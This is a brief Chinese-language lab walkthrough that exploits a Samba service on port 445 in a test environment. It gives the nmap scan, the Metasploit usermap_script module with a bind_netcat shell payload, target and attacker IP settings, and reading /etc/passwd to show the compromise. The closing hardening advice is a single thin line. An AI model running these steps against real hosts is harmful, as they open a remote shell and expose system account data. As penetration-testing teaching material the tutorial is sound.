准备工作 nmap扫描 Samba漏洞利用 漏洞加固 准备工作 准备一台开启445端口的靶机和一台渗透机方便测试 nmap扫描 nmap -sV -p445 172.16.1.32 -T5 通过扫描发现445端口开启 漏洞利用 use multi/samba/usermap_script 模块利用 set payload cmd/unix/bind_netcat 设置载荷模块 set rhost 172.16.1.32 设置靶机ip set lhost 172.16.1.94 设置攻击机ip(即kali机ip) cat /etc/passwd 发现成功回弹用户信息,渗透成功 漏洞加固 可以通过开启防火墙,进行防护,本文用的445端口,加固的话,禁用445端口就好了。 注:文章中的所有内容仅供做学习使用,任何人用此方法进行未经授权的渗透行为都与文章与我本人无关,请各位大佬不要进行未经授权的渗透行为……